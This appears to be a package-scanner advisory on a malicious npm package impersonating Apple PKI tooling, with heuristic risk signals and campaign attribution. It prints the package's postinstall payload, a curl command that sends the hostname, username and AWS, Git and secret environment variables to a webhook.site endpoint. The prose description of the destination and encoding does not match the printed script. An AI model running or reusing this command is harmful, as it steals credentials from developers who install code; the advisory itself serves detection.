apple-internal-pki-utils @1.0.1

[Always reject] Script: D=$(hostname; whoami; printenv | grep -E 'APPLE|AWS|GIT|SECRET'); curl -G --data-urlencode "log=$D" https://webhook.site/9a376595-d347-4110-ac32-814e6e2f0754

[Always reject] Matched 6 signal(s), weighted score 8: • [S_PUBLISHER_MASS_PRODUCTION] Maintainer 'raya4321' owns 20 packages, ≥70% share a templated name shape. • [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere. • [S_NO_KEYWORDS] No keywords declared. • [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared. • [S_TINY_PAYLOAD] Tiny payload: 1 code file(s), 430 bytes total. • [S_INFLATED_FIRST_SEMVER] First publish at version 1.0.1 — inflated semver on a brand-new package.

Malicious npm package published by threat actor "raya4321" as part of a coordinated typosquatting campaign impersonating Apple internal infrastructure services (authentication, PKI, telemetry, CloudKit, and cloud infrastructure). All packages in this campaign execute credential-theft payloads during npm installation via preinstall or postinstall lifecycle hooks. Trigger: postinstall. Exfiltrates hostname and filtered environment variables matching APPLE, AWS, GIT, or SECRET key patterns, base64-encoded, to a requestcatcher.com endpoint constructed from the $CATCHER_NAME environment variable (/apple_leak path).

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.